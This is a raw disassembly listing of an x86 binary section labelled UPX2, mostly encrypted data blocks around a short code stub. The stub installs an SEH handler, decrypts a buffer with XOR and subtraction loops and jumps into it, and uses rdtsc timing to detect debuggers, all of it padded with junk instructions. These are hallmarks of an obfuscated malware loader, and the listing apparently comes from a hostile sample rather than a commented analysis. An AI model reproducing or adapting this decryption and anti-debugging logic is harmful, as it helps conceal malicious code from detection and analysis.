60795C88h, 0A6F6DBC9h dd 0E2EA4CABh, 7CD73B26h, 87DA0AA1h, 0C6693E83h, 9732AF8Eh dd 0E5DD2009h, 0DD331C7Eh, 0D004AB66h, 8BA9C55Dh, 0AA73D4B7h dd 8D65AD5Ah, 0B0244BAAh, 13EC79B1h, 608764F0h, 1D015831h dd 59C154B6h, 37FE49A7h, 0D1B34490h, 0F845D44Fh, 8F823499h dd 0DE71029Bh, 6F02A186h, 0D83FA87Ah, 0C8379D76h, 0B2ABAD1h dd 40D20CDEh, 8051F7DEh, 83771A1h, 0A80A6CF8h, 26F7F446h dd 889DD9BDh, 0C241D400h, 791D8DADh, 85EB25D1h, 78EC033Ah dd 0F07A1BAEh, 5481A78Eh, 0F0252105h, 8A891C48h, 21C555F5h dd 0CD23ED99h, 0C014BB7Ah, 732DF39Dh, 85F18DD0h, 2792BFC3h dd 0A3162771h, 0D91195EEh, 1122579Eh, 611D9314h, 9D96BDC8h dd 0F956C69Dh, 3B59D4E4h dd 0FC082732h, 0EDD26685h, 2FC5D4BAh, 6B7337AFh, 0FE151C6Bh dd 1429C766h, 78296CFAh, 302A76D9h, 23C96CCEh, 0AD890F89h dd 0AEC43403h, 0CFF92836h, 0B446859Dh, 3C64B647h, 54D84BE4h dd 0AC6E1E36h, 46F6C0FAh, 0E07E7972h, 9159F40Bh, 950F957Dh dd 3CAA4936h, 8371B9EDh, 0BD95FC0Ch, 4FED8BE5h, 7FB7EFC5h dd 0AF412A8Fh, 0E785FABAh, 0D3A56949h, 8C65827Bh, 7F1DBBBDh dd 0CB19EB23h, 60563BA4h, 0D5B553F1h, 2F9677D6h, 273F18F1h dd 8B81EB89h, 37D4A106h, 0A8B27199h, 47E58024h, 0CF6CD5BEh dd 448E6331h, 137D1BB8h, 98ECB46Ch, 739AD436h, 6015B351h dd 62C426h, 2B37BDC3h, 19528225h, 68CA2F55h, 6B705B62h dd 6E8584CBh, 0F2BBF0F6h, 5948D08h, 4A78BBCh, 0B39AFC5Dh dd 6E114888h, 78B16D28h, 14876B83h, 0EF7ADC3Dh, 0B0F242F5h dd 8D65CC2Eh, 80E24701h, 0FA06FFE8h, 734FB099h, 0ABC1AC0Eh dd 0C062198Eh, 5C353C5Eh, 50B217F9h, 0E80AACD3h, 0C4260B46h dd 501A7CDDh, 0CF6D0AEFh, 0AB73EEC1h, 8501E446h, 98CC6362h dd 18305F36h, 0A3FA0625h, 3366B7E7h, 7BDFD75Eh, 0E0183DDEh dd 576AA907h, 0AA41A430h, 58BAA472h, 386394F7h, 0B755EBFEh dd 0F88111D6h, 182BFC68h, 88B6C1E6h, 8E0EC78h, 0D85AAD38h dd 0FF0C342Ah, 4277AB49h, 0DBA85821h, 25777544h, 135A8A26h dd 0D557C373h, 0E84A9A36h, 14C32486h, 7DBF6BDCh, 53B2224Eh dd 0BD2A8CEEh, 0E507856Ah, 471A4AE6h, 0DB690BA9h, 0D87EDC4h dd 2082D27Eh, 0F0F25CBEh, 1072D430h, 88EC24F7h, 0E83AC426h dd 8725DBB6h, 0C8CF319Ch, 0EC4C2CB8h, 0D67A392Ch, 0C53F947Eh dd 3232A2CEh, 0ED2FFB8Eh, 0C822B2DEh, 4D9AFC5Eh, 2FAFF4DFh dd 298ADA76h, 25F5A1B2h, 184CE49Bh, 98F254B6h, 0B5EAD75Ah dd 80D47C3Bh, 78EAC81Bh, 46EAAA2Bh, 4F3EA90Eh, 585D9906h dd 0AC3F9CC8h, 0F537E3E8h, 0C82ABAD6h, 34220466h, 25A7FCD7h dd 3292C26Eh, 0D89E5B9h, 20B4DBA6h, 6BFDB4BEh, 719A2BC9h dd 6015B353h, 62C656h, 4746A115h, 6D51B420h, 68FC132Eh dd 1FBEDDEEh, 83E1381h, 5B3294F4h, 7E9594DBh, 0FC7C0FE6h dd 4272225Dh, 0BFED8B2Bh, 2888D6CCh, 8448E5C6h, 0F87ADC5Eh dd 0C6A0AA3Dh, 0B7EB62Dh, 51554DCh, 0F86C84BBh, 60D23496h dd 55C3B87Bh, 60F41B62h, 0E08A2973h, 0DD391440h, 0C81C9C89h dd 0F9F5A095h, 0B81A76F2h, 209241DBh, 0DF96CF8h, 2261E4F7h dd 1D0DF84Dh, 1044EC93h, 98EA4CAEh, 0CC4029h, 0B253C9Eh dd 1EE45C3Eh, 0FD41D371h, 0E0749BD2h, 0DCB5CEFBh, 0D032946Eh dd 7732B9E5h, 8AA984D0h, 1CD07D4Eh, 501274B6h, 5B82A665h dd 0A3CB57C4h, 9541C84Ch, 90C444D1h, 180D41A5h, 0D6904490h dd 7B7E8095h, 46C25333h, 4FC9AC0Eh, 60C224E1h, 0D04017FEh dd 53BA5E77h, 43DD0B19h, 769DA8E3h, 1D9F8BDEh, 7092C26Eh dd 0DC0A6CCEh, 239A1344h, 0A8D350CCh, 2F9261BFh, 0FB614C98h dd 0F752C50Eh, 4EE2991Bh, 0F052F416h, 9FC8588Eh, 0A9AAF51Eh dd 145E382h, 0A331981Dh, 44D82746h, 64D1D2B7h, 8D17A501h dd 0B0244C66h, 176E51C7h, 4F164F0h, 29758261h, 4375D924h dd 326ACC2Eh, 0B6DAE733h, 915CC91Eh, 44844C44h, 181A241Ch dd 9F18846Eh, 92B1C601h, 40F8177Ah, 0F08F0919h, 40A20450h dd 0F9976CDEh, 0B9818153h, 9E358C43h, 4707E746h, 1BFA6AAEh dd 1072B391h, 0CBC14CAEh, 52E54D0Eh, 8FDA3C9Eh, 0C66ED493h dd 68CA2D8Eh, 2745D006h, 0F81A143Dh, 55C53456h, 489C34CBh dd 402284E6h, 0D0C8FB2Ah, 4FED83ACh, 0C8076714h, 430252F9h dd 3031553Bh, 1D79595Dh, 85CF3F2h, 83094645h, 0F72F795h dd 46EA9113h, 0E84AAF0Eh, 0EBD65086h, 0EE05787Bh, 803F1776h dd 0CB2ABAD1h, 769DC8E3h, 33127DDEh, 0B519E41Ch, 0A83C5352h dd 538AAE7Fh, 90B0D5BDh, 93629637h, 3EA14CDh, 365D60A3h dd 506A549Eh, 0B253B416h, 2BCB7586h, 43D72E56h, 0AFBA2A46h dd 0E60A3173h, 48AA0C6Eh, 0C324F0F6h, 0E8A9BD3h, 4712C2D6h dd 1EB249CBh, 0A20264C6h, 0E66EA93Eh, 3577A370h, 86AFA16h dd 0F5E240A6h, 5CEF3618h, 87D202AEh, 0DE72098Bh, 60822486h dd 5231E9FEh, 0FA701671h, 3FC85AECh, 47280D8Dh, 0BAB0BEECh dd 3651680h, 8A81081Ch, 78806B22h, 0A786E13Dh, 1F72D400h dd 7710922Ah, 98D73BD9h, 87DA0AA1h, 0C6696683h, 0FC7FD38Eh dd 1F429239h, 6E815AEBh, 50BF19F6h, 0C5AA3A51h, 0F61D0C73h dd 52C8AD5Eh, 0CCA78BD6h, 0D78ADA71h, 9639A253h, 64CF233Eh dd 6FF26289h, 3E518ABBh, 0E857C9A6h, 75A8A20h, 46ED4C23h dd 7DB5FA0Eh, 60F41F44h, 0E746397Dh, 93B21440h, 0C82A8C06h dd 41C85966h, 8FAA915Fh, 0C0CAF460h, 0DC8FADC1h, 0A582D253h dd 50799F7Eh, 0D17D24C9h, 0BEFF382Bh, 105F0726h, 0DDA169Eh dd 8CD3D20Ah, 19A620AAh, 822B773h, 0A745E3BAh, 4DA9183h dd 0A055F394h, 3FDD7B34h, 1565D23Fh, 0A22622AEh, 288AC9F6h dd 5EA04C6h, 6D8523C1h, 0B4B6DF8Fh, 60DF411Eh, 0BE27298h dd 793CB44Eh, 3D032ACh, 0E822FA2Bh, 0EBC2DB86h, 8A3AF63Ah dd 4227EB26h, 4B2ABAD2h, 7E230CA2h, 0E4254382h, 0F611F723h dd 528B84CAh, 5F6A1BB9h, 0F905A341h, 10066CF5h, 39014CAEh dd 62EB9Eh, 78C7D49Eh, 0D090B416h, 68FA948Eh, 0F0AAA406h dd 9ABA1C7Eh, 558A94D2h, 0A0AA0C6Fh, 0C02284E5h, 0B59AD09Ch dd 7D1E5082h, 28726F60h, 48627DBAh, 187ADC3Eh, 0A0D6003Dh dd 89704773h, 0B6DAC34Bh, 19E0541Eh, 0B2B3CB69h, 0EB4FAC0Ah dd 62C52580h, 833E2076h, 15FF66ADh, 441244h, 90h, 15ACh dup(0) ; =============== S U B R O U T I N E ======================================= public start start proc near call loc_3144200F call sub_314420A0 jmp near ptr byte_3144204E start endp ; --------------------------------------------------------------------------- loc_3144200F: ; CODE XREF: startp push dword ptr fs:0 add ds:dword_3144204F, esp mov fs:0, esp xor eax, eax push 80000000h push 80000000h push 80000000h push 20h push 1 push 2000h push eax push 100h ; DATA XREF: sub_314548C2+Cw push eax call ds:dword_3143808C ; LoadLibraryA ; --------------------------------------------------------------------------- byte_3144204E db 0BCh ; CODE XREF: start+Aj dword_3144204F dd 12FFBCh ; --------------------------------------------------------------------------- pop large dword ptr fs:0 pop esi sub eax, eax loc_3144205D: ; CODE XREF: UPX2:31442063j dec al or al, al jz short loc_31442067 jnz short loc_3144205D jmp short loc_314420CE ; --------------------------------------------------------------------------- loc_31442067: ; CODE XREF: UPX2:31442061j call sub_3144209C sub ebx, 0FFFFFFBFh sub edx, edx xor edx, 28B0h mov esi, 83h push ebx loc_31442080: ; CODE XREF: UPX2:31442094j mov al, [ebx] sub ax, si cld cld mov [ebx], al cld cld cld add ebx, 1 inc esi dec edx cmp edx, 0 jnz short loc_31442080 pop ebx jmp ebx ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= sub_3144209C proc near ; CODE XREF: UPX2:loc_31442067p pop ebx jmp ebx sub_3144209C endp ; sp-analysis failed ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_314420A0 proc near ; CODE XREF: start+5p arg_C = dword ptr 10h mov eax, [esp+arg_C] pop dword ptr [eax+0B8h] xor eax, eax retn sub_314420A0 endp ; sp-analysis failed ; --------------------------------------------------------------------------- db 0E8h, 2 dup(0) dd 48B0000h, 9889FC24h, 2FE3h, 28A080F7h, 0 dd 5C8B8000h, 2C740424h db 59h, 89h ; --------------------------------------------------------------------------- loc_314420CE: ; CODE XREF: UPX2:31442065j mov al, 0E7h das ; --------------------------------------------------------------------------- db 2 dup(0), 89h ; --------------------------------------------------------------------------- mov eax, 2FEBh cmp byte ptr [eax+28A4h], 0E8h jnz short loc_314420EF add ebx, [eax+28A5h] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_314420F7 ; --------------------------------------------------------------------------- loc_314420EF: ; CODE XREF: UPX2:314420E0j mov ebx, [eax+28A6h] push dword ptr [ebx] loc_314420F7: ; CODE XREF: UPX2:314420EDj pop ebx push ebp mov ebp, eax sub dword ptr [esp+4], 80B2h sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+3638B0h] mov ecx, 0 ; CODE XREF: UPX2:31442187j rep movsb call sub_3144216D mov ecx, eax call sub_3144216D sub eax, ecx jz short loc_31442141 cmp eax, 100h ja short loc_31442141 lea eax, [ebp+3610D3h] mov dl, [eax-10h] call sub_31442171 jmp short loc_31442180 ; --------------------------------------------------------------------------- loc_31442141: ; CODE XREF: UPX2:31442128j ; UPX2:3144212Fj ... test dword ptr [ebp+3638A5h], 80000000h jz short loc_3144216B lea esi, [ebp+3638A9h] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FECh] mov edi, [ebp+363FF0h] mov ebx, [ebp+363FE8h] loc_3144216B: ; CODE XREF: UPX2:3144214Bj pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3144216D proc near ; CODE XREF: UPX2:3144211Ap ; UPX2:31442121p rdtsc retn sub_3144216D endp ; --------------------------------------------------------------------------- db 0C0h ; =============== S U B R O U T I N E ======================================= sub_31442171 proc near ; CODE XREF: UPX2:3144213Ap mov dh, dl mov ecx, 27D2h loc_31442178: ; CODE XREF: sub_31442171+Cj xor [eax], dl inc eax add dl, dh loop loc_31442178 retn sub_31442171 endp ; --------------------------------------------------------------------------- loc_31442180: ; CODE XREF: UPX2:3144213Fj inc ecx arpl [eax-10h], ax aas jg short near ptr loc_31442141+7 jnp short near ptr loc_31442113+4 aam 28h imul esi, [ebx+2B8148F4h], 0C0004180h cmc scasd mov eax, [ebx] add dword ptr [ebx], 3Ch cmpsb add [eax+50h], edi test esi, ebp lodsb mov edx, [eax+4BD343F8h] repne pusha mov ecx, [edx-6E0CBC68h] sub eax, 1A6C343h cmp [edx], al mov ah, 0D0h xor eax, 45F84109h outsd mov ds:0C57424C1h, eax bound ebp, [edx+69439D59h] or al, 0E4h or esi, [edx] and al, 99h xor dword ptr [ebx+0E84770Fh], 0FFFFFF8Bh mov edx, 4BFB439Ch mov ah, 0C7h add esi, [ebx] push 80C0004Ch add ebp, [edi+ebp*4-0Dh] and eax, 24EEA148h insb movsd adc byte ptr [ebx], 0FFh push ss or ebp, eax inc esi sti mov dh, 40h call near ptr 3184A2CDh xor edx, 25h popa mov ah, 0E5h add eax, 34EEA576h inc ecx rcl bl, 0BFh setalc dec ecx add eax, 80F63B0Ah test al, 0Dh rol byte ptr [eax-0B5AB8C0h], 0Ch popa mov bl, 0F4h add eax, 32EFB272h add [ebx+4589967Fh], dl into jnp short loc_31442266 shr byte ptr [eax-7Dh], 3 rol byte ptr [eax+4CFC0C5h], 43h ; --------------------------------------------------------------------------- db 0FFh dd 0FF107F3Fh, 367BCE55h, 0F8005C0h db 45h, 1 ; --------------------------------------------------------------------------- loc_3144224A: ; CODE XREF: UPX2:31442273j inc ebx add al, al add ch, bh sub al, 0D5h mov dh, 40h add [ebp+28B5BF94h], esi mov edi, 0D3E0076h insb adc eax, 85CF80F6h inc esp xchg eax, ebp loc_31442266: ; CODE XREF: UPX2:3144222Ej jbe short $+2 sub eax, [edi-6ABB5A3Dh] jbe short $+2 rol byte ptr [ebx], 0E5h jz short loc_3144224A mov dh, 40h add [ebx+25h], al cmp ds:834080F6h, dl db 65h cld push ebp rol byte ptr ss:[eax+5145C617h], 52h rol byte ptr ss:[ecx-446D4A37h], 76h add [ebp+35h], cl mov al, 15h test byte ptr [eax+3D4DC973h], 1Eh cmp esi, esi xor cl, 20h sub [ebx+eax*2], cl add al, al fistp qword ptr [edi+76BB5E95h] add [ecx], al push 54440F5Fh inc eax add al, al or eax, [edi] adc al, 0AAh rol byte ptr [ebx-3Dh], 0A8h adc byte ptr [eax+0], 0C8h or ebp, eax push esi sti mov dh, 40h push 40F0C9h stosb cmp byte ptr [edi+76BB1695h], 0 inc ebp inc eax dec edi test [esi], ch ; CODE XREF: UPX2:31442311j add byte ptr [eax+0], 57h or eax, 0B6D000F5h inc eax mov ebp, [edi] cmp [ebx+0Ch], eax rol byte ptr [eax-6F3F123Fh], 76h add [ebp+15h], cl adc [edx], edx test byte ptr [eax+623FA5B3h], 0C3h in al, dx loopne near ptr loc_31442309+4 mov esp, 80B3C86Ah pop ecx dec ebp loc_31442309: ; CODE XREF: UPX2:31442300j adc eax, 80F61B79h mov bl, 0ABh dec ebx jl short near ptr loc_314422DB+1 push edi sar byte ptr [esi+7], 1 sbb al, 97h call near ptr 0B2052361h mov edi, 76BB9695h add [ebx+44h], al pusha test [eax], eax pop esp lahf retn 4080h ; --------------------------------------------------------------------------- db 97h dd 12A80AAh, 4480A8h, 40E840h, 95BF80C1h, 76BB96h, 844F4045h dd 408242h, 681080AAh, 4480C0h, 0E88180AAh, 12AD7CCh, 41E890h dd 95BF80C1h, 76BB96h, 1408AA8h, 56D57FC0h, 0E840B6FBh dd 4080C5h, 42D129h, 5940EAC0h, 0A2A8A23h, 3B8A153Fh, 0F1AB80F6h dd 76FD0303h, 40B6FBh, 27404CFh, 6A880C0h, 4E4080C0h, 4C0CC494h dd 92D57FC0h, 8D40B6FBh, 36574A75h, 8D89B3C0h, 367B5E7Dh dd 934E31C0h, 42F428h, 12FD03C0h, 40B6FCh, 24004CFh, 85CB80C0h dd 76BB22h, 8F41F03Fh, 36777C45h, 0FAC50BC0h, 0FF40B6FBh dd 85CF81B0h, 76B889h, 3BA6054Bh, 70BF80F6h, 50C50FC1h dd 8B40B6F8h, 367B6A4Dh, 0FF5A63C0h, 85CF81B1h, 76B89Dh dd 3BB20D4Bh, 9A380F6h, 8F41F13Fh, 3678EA45h, 1F868C0h dd 0BDCD80C0h, 76BCA8h, 2A4F4Bh, 70BF5936h, 3A103C4h, 0F943C0AAh dd 6A40EA97h, 0D7F50DD8h, 0B940B6D5h, 4080D9h, 0FE0D844Dh dd 66BF7F3Fh, 4D440D6Bh, 4080C0h, 47CD2BA6h, 0E4722BC4h dd 3B54154Dh, 66EC80F6h, 0AB268249h, 0E2424243h, 6A940B35h dd 7049E8C0h, 0CCCB80C0h, 0C4CB80AAh, 2880AAh, 6A4880C0h dd 6A12D180h, 95BFD0CEh, 76BB2Eh, 40840398h, 3089A8h, 6A940BC0h dd 6A8C0BC0h, 6A40EA80h, 2AD2C2h, 3089A8h, 5140EAC0h, 0FF107FAAh dd 367B7655h, 8519DFC0h, 7C48F3Fh, 8D4080C1h, 36508075h dd 0C4339C0h, 0EFCB80C0h, 0EDC12533h, 7690C0h, 1477054Dh dd 0E0BF80F6h, 202AD490h, 95BF7FAAh, 76BB3Eh, 751F4045h dd 10E68F4h, 11A880C0h, 534080C0h, 6225C4A5h, 7210E7B5h dd 6C29F6A9h, 25E7A5h, 50F6897h, 0B5BF80C0h, 76BFACh, 3BC2153Fh dd 0FF1780F6h, 367BC655h, 6A40EAC0h, 76D57FC2h, 0B940B6FBh dd 4081E8h, 89A1AB57h, 5714A4CCh, 3BFA153Fh, 0F67380F6h dd 3C162543h, 544080F6h, 0BED57F97h, 8540B6FBh, 4626F400h dd 72447E43h, 24347F2Eh, 6A40EAC8h, 0B6D57FEAh, 8540B6FBh dd 939CF400h, 450728h, 9189B3C0h, 8579BA23h, 76BC96h, 7CC1B2B5h dd 7323A4E4h, 2834F3B2h, 0EDD4141h, 541080C0h, 5011D690h dd 95BFD390h, 76BBAEh, 74194045h, 24347FCFh, 56C50FC8h dd 0E840B6FCh, 0FFBF7D05h, 46D57F93h, 0EB40B6FBh, 2884014Eh dd 574080C1h, 3B06153Fh, 95BF80F6h, 76BB86h, 0FFBBE829h dd 6A1A803Fh, 6A40EAC0h, 6840EAC0h, 4480C1h, 2A444Bh, 8B4CEA90h dd 56A27F04h, 74DFB8h, 0E889B3C0h, 0FFBF7F1Ah, 1506154Dh dd 511280F6h, 95BFD091h, 76BB8Ah, 0C3604443h, 5818D850h dd 7089C0h, 4EE8C0h, 4081C0h, 2 dup(4080C0h), 6825C0h dd 4080C0h, 5316D1C0h, 3B12153Fh, 59EB80F6h, 7580046Ch dd 0C3AE623Bh, 1931154Dh, 0FF1280F6h, 367B2A55h, 6CC509C0h dd 0E840B6FFh, 4080D6h, 6B2FEF8Ch, 7210F0B5h, 6C29F6A9h dd 5625E7A5h, 6535ECA1h, 0FF108081h, 367BD255h, 70C509C0h dd 0C340B6FFh, 7321C29Ch, 6D21CEA5h, 620FE4A5h, 7423E5AAh dd 7416DCB3h, 7423E593h, 7433ECC0h, 6E25ECB2h, 6532C3C0h dd 4625F4A1h, 4125ECA9h, 6532C3C0h, 4625F4A1h, 4D25ECA9h dd 6930F0A1h, 1E7AEh, 6125F283h, 7210E5B4h, 7325E3AFh dd 4340C1B3h, 7421E5B2h, 6D25D2A5h, 5425F4AFh, 6125F2A8h dd 720380A4h, 6534E1A5h, 6532E894h, 4340E4A1h, 7421E5B2h dd 6F2FD4A5h, 6C25E8ACh, 5372B3B0h, 7330E1AEh, 34EFA8h dd 7429F885h, 6532E894h, 4640E4A1h, 5425ECA9h, 5425EDA9h dd 7339D3AFh, 542DE5B4h, 25EDA9h, 6525F286h, 7222E98Ch dd 39F2A1h, 4634E587h, 4125ECA9h, 6932F4B4h, 6534F5A2h dd 4740C1B3h, 6906F4A5h, 6913E5ACh, 4740E5BAh, 6906F4A5h dd 6914E5ACh, 4740E5ADh, 6F0DF4A5h, 652CF5A4h, 642EE188h dd 1E5ACh, 5434E587h, 4630EDA5h, 4E25ECA9h, 4125EDA1h dd 7425C7C0h, 702DE594h, 6834E190h, 65078081h, 7225D6B4h dd 6E2FE9B3h, 7425C7C0h, 7332E596h, 452EEFA9h, 4740C1B8h dd 6F16F4A5h, 652DF5ACh, 6F26EE89h, 7421EDB2h, 412EEFA9h dd 612FCCC0h, 6229CCA4h, 7932E1B2h, 610D8081h, 6529D6B0h dd 4626CFB7h, 25ECA9h, 6E25F08Fh, 652CE986h, 7030E18Dh dd 4127EEA9h, 6530CFC0h, 6F32D0AEh, 7333E5A3h, 6F32D0C0h dd 7333E5A3h, 6906B2F3h, 34F3B2h, 632FF290h, 3333F3A5h dd 7825CEF2h, 651380B4h, 6C29C6B4h, 7434C1A5h, 7522E9B2h dd 4133E5B4h, 7425D3C0h, 652CE986h, 652DE994h, 652CD3C0h dd 5340F0A5h, 6534F3B9h, 6D29D4ADh, 462FD4A5h, 5425ECA9h dd 25EDA9h, 612DEE95h, 6529D6B0h, 4626CFB7h, 25ECA9h, 7432E996h dd 412CE1B5h, 632FECACh, 6932D7C0h, 6906E5B4h, 4E40E5ACh dd 6A24C1B4h, 5034F3B5h, 6936E9B2h, 6527E5ACh, 6B2FD4B3h dd 4E40EEA5h, 6532C3B4h, 4625F4A1h, 25ECA9h, 7203F48Eh dd 6534E1A5h, 632FF290h, 33F3A5h, 7203F48Eh, 6534E1A5h dd 632FF290h, 4533F3A5h, 740E80B8h, 6125F283h, 6513E5B4h dd 6F29F4A3h, 740E80AEh, 6125F283h, 7315E5B4h, 7210F2A5h dd 7325E3AFh, 740E80B3h, 5630E18Dh, 4F37E5A9h, 6325D3A6h dd 6E2FE9B4h, 4F34CEC0h, 462EE5B0h, 25ECA9h, 700FF48Eh dd 7210EEA5h, 7325E3AFh, 6B2FD4B3h, 4E40EEA5h, 6530CFB4h dd 6325D3AEh, 6E2FE9B4h, 5034CEC0h, 6534EFB2h, 6916F4A3h dd 6135F4B2h, 6D25CDACh, 39F2AFh, 7511F48Eh, 4939F2A5h dd 722FE6AEh, 6934E1ADh, 6F14EEAFh, 2EE5ABh, 7217F48Eh dd 5625F4A9h, 7534F2A9h, 650DECA1h, 7932EFADh, 6C34D2C0h dd 6329EE95h, 5325E4AFh, 6E29F2B4h, 412FD4A7h, 5329F3AEh dd 6E29F2B4h, 531780A7h, 6134D381h, 7035F4B2h, 6F2CE3C0h dd 6F33E5B3h, 7425EBA3h, 6E2FE3C0h, 7423E5AEh, 7425E7C0h dd 7433EFA8h, 612EF9A2h, 7240E5ADh, 36E3A5h, 642EE5B3h dd 632FF3C0h, 34E5ABh, 6534EE89h, 7425EEB2h, 732FEC83h dd 6E21C8A5h, 25ECA4h, 6534EE89h, 7425EEB2h, 4334E587h dd 652EEEAFh, 6425F4A3h, 7421F493h, 6E0980A5h, 6E32E5B4h dd 700FF4A5h, 1EEA5h, 6534EE89h, 7425EEB2h, 6E25F08Fh dd 412CF295h, 742EC9C0h, 652EF2A5h, 6125D2B4h, 6C29C6A4h dd 440180A5h, 4910C196h, 446EB2F3h, 5240CC8Ch, 6C03E7A5h dd 4B25F3AFh, 5240F9A5h, 700FE7A5h, 650BEEA5h, 4138C5B9h dd 6725D2C0h, 7225F591h, 6C21D6B9h, 7805E5B5h, 65128081h dd 7425D3A7h, 752CE196h, 4138C5A5h, 0F673D6C0h, 561682AAh dd 12A544Bh, 18327F92h, 70D57F96h, 8B40B6FFh, 5616D604h dd 70BFD690h, 0DED57FD8h, 8340B6FBh, 0C21E9004h, 49CD80C8h dd 5188AB3Bh, 4080A8h, 240C0D28h, 6A40EAC3h, 5310D1C5h dd 0CCCB85AAh, 50940B90h, 5100EA94h, 95BFD392h, 76BCC6h dd 0FF4C4443h, 367C8E55h, 88403C0h, 14D50D03h, 3340B6FBh dd 5240EA09h, 3240B0A8h, 51840BC0h, 5000EA91h, 8358EA91h dd 6A148800h, 95BFD0CEh, 76BCC2h, 33604443h, 0F800512h dd 0DAB74259h, 0C382A398h, 0E8BFB397h, 0FFBF7F01h, 0E504CFh dd 681080C0h, 40F0C9h, 2A544Bh, 402A4C4Bh, 104080A8h, 5242EAC0h dd 92880AAh, 6A4080B0h, 5013D1C0h, 3BB6153Fh dd 591F80F6h, 3B06153Fh, 0FFC580F6h, 8DCBF1B4h, 7695BCh dd 95CD8C23h, 7690C0h, 531751C3h, 85CB523Fh, 76BB22h, 27BB0F4Dh dd 2BA880C0h, 8BBF7F3Fh, 367B7A45h, 48CF0DC0h, 0E84080E8h dd 0FFBF7FDAh, 3BA6054Bh, 8FCD80F6h, 40A88Fh, 0FFBF8928h dd 0EAC50B3Fh, 8540B6FBh, 8D60F400h, 68DC4Fh, 0FEB468C0h dd 85CB7F3Fh, 76BB32h, 0B344045h, 28290F4Dh, 0DFA880C0h dd 8BBF7F3Eh, 5583DF07h, 408028h, 0EDC1DDC0h, 769BD0h dd 85CD49F3h, 769E5Dh, 5111D491h, 0FF11D190h, 367BF255h dd 244407C0h, 3B06153Fh, 0C21D80F6h, 0E81580C4h, 4080C0h dd 3FAD019Dh, 6A40B6DBh, 0AD50D3Fh, 5040B6DBh, 24604D92h dd 8340AAC0h, 0C7268C04h, 365BD045h, 0C7604DC0h, 365BD245h dd 2A40A4C0h, 6A83DDC0h, 9A8D8DAh, 8D4080C0h, 0FEEAE182h dd 0C3B0F509h, 3C2015A9h, 844580F6h, 890288C8h, 367CE055h dd 0C3A277C0h, 406895h, 811D80C0h, 365B192Dh, 64DD0BC0h dd 8340B6FCh, 48A4BCh, 0F904CFh, 0ECC180C0h, 4082C8h, 144E894h dd 95BF80C0h, 76BB5Ah, 84CD7C4Bh, 4184E4h, 2AD0C0h, 408428h dd 5212D6C0h, 95BFD7C0h, 76BB56h, 97CD49F3h, 4081C4h, 22AD191h dd 6841EA91h, 404080C0h, 62D57F92h, 9640B6FBh, 5B347645h dd 428D490h, 574080C1h, 2064343Fh, 0FF4080C2h, 367CC255h dd 0C0C5D9C0h, 14A396B4h, 6A940B90h, 5711D2C0h, 0DAD57F96h dd 5940B6FBh, 0D0354045h, 46D57F96h, 8D40B6FBh, 5712C497h dd 8D18C4AAh, 418457h, 0C0732BC0h, 0F31990AAh, 5010D06Bh dd 5010D090h, 6AD57F92h, 8140B6FBh, 428804h, 24347FC0h dd 32D57FC8h, 5340B6FCh, 3C72153Fh, 0C21D80F6h, 3EC080C4h dd 4641F5CAh, 15380D4Bh, 19A380F6h, 1040154Dh, 0D14380F6h dd 84927F96h, 1FC88F00h, 0F4080C1h, 419044h, 3A7E00C0h dd 800690B5h, 844F80FEh, 4081C1h, 7560BE40h, 3EC1C631h dd 470EC990h, 0CFCBC2B5h, 4F41C606h, 6A114EEBh, 5316D1C0h dd 3C6A153Fh, 3B1980F6h, 0DFC58F01h, 8D4080C0h, 365E1145h dd 6840EAC0h, 4080CCh, 95BFD390h, 76BCEAh, 408CFDh, 0BFC58FC0h dd 0E94080C0h, 408071h, 5210BE41h, 854FD689h, 408065h dd 0AC484643h, 844F8DFCh, 408059h, 0F335A0FCh, 0F7ABC6Ch dd 400C45h, 204D2DC0h, 3D60A0E0h, 7425E7E1h, 3CECFFB5h dd 813CF5E0h, 68607FBEh, 7135F4B4h, 7043FE41h, 756FAFFAh dd 0FF0746A8h, 0BA718FC0h, 40A7D0h, 0FF126237h, 367B4A55h dd 5080B3C0h, 0E810D090h, 4080C9h, 6E37EF84h, 6421EFACh dd 3AD57FC0h, 8540B6FCh, 3376F400h, 64C50909h, 5140B6FCh dd 4280A8h, 5611D140h, 3ED57F90h, 8D40B6FCh, 365B1355h dd 0C973D0C0h, 5210D194h, 95BFD191h, 76BBB2h, 0FF648447h dd 367BC655h, 808378C0h, 3655EB4Dh, 0C3B981C0h, 12A81AAh dd 73BFB33Fh, 80557FC4h, 3600887Dh, 5E3481C0h, 5A344045h dd 0D0CB5BF3h, 50438B73h, 0B7F50DFCh, 8B40B6DDh, 418C7Ah dd 8CA0BC0h, 34080C1h, 608BAB38h, 0A6B34B4Bh, 4745F4A1h dd 2EAB7522h, 534F4743h, 8B174C4Bh, 6A14D014h, 6A12D180h dd 6D57F3Fh, 8B40B6FCh, 367BFA4Dh, 0C8403C0h, 0E9C34FEBh dd 6A4747C7h, 894068C0h, 5383838Fh, 5714C68Fh, 5C05D281h dd 7223E98Dh, 662FF3AFh, 6917DCB4h, 772FE4AEh, 7503DCB3h dd 6E25F2B2h, 7225D6B4h, 6E2FE9B3h, 7038C59Ch, 6532EFACh dd 611480B2h, 7425E7B2h, 7433EF88h, 4082C0h, 408090h, 6332E9C0h dd 693AAEA4h, 706EE6A5h, 490E80ACh, 6B60CB83h, 7A38E7B0h dd 0A2BEFAFh, 5205D395h, 4F0AE2E0h, 2660CE89h, 7432E9B6h dd 0E8158AB5h, 4080C0h, 0A3AD019Dh, 0C640B6DEh, 3655EB45h dd 95BF80C0h, 76BB5Eh, 745F6801h, 8B5EEAFCh, 367BD675h dd 3CECD9C0h, 666AF5EEh, 1DBFBE41h, 0BDCDA3B5h, 76BC9Ah dd 5742F64Bh, 8DE5E665h, 36775145h, 0F7C50FC0h, 0FA40B6F7h dd 8CBAC649h, 0B1BB7E8Eh, 0EB8F62C1h, 0FB5F68A1h, 7CC37F3Fh dd 754488E4h, 8C54695h, 40B680h, 408828h, 4306D3C0h, 4C0CC4EEh dd 0AAD57FC0h, 0B40B6FBh, 9357F400h, 0FF1382AAh, 367BD255h dd 748005C0h, 8C57EC8h, 0FF40B680h, 84A81310h, 0E8BF7F3Eh dd 4080CBh, 5F03C693h, 446ED38Fh, 0FF40CC8Ch, 367B2A55h dd 0FE2968C0h, 0EEA87F3Fh, 0FFBF7F35h, 3652514Dh, 8D89B3C0h dd 36008445h, 